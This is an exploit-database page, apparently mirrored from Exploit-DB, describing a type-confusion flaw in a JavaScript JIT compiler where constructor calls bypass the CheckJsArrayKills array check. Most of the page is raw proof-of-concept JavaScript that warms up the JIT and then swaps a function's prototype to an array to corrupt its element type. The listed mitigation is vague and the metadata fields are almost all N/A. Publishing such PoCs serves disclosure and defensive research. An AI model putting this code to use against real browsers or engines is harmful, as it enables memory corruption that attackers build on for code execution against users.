header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

CheckJsArrayKills Vulnerability

This vulnerability is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552). If a JavaScript function is used as a constructor, it sets the new object's '__proto__' to its 'prototype'. The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information. A proof-of-concept code is provided in the text.

Mitigation:

The user should ensure that the JavaScript functions are not used as constructors.
Source

Exploit-DB raw data:

/*
This is similar to the previous issues 1457,  1459 (MSRC 42551, MSRC 42552).

If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.

PoC:
*/

function inlinee() {

}

function opt(arr) {
    arr[0] = 1.1;
    new inlinee();
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        inlinee.prototype = {};
        opt(arr);
    }

    inlinee.prototype = arr;
    opt(arr);

    print(arr);
}

main();

Navigation

Suggest Exploit

Services By CQR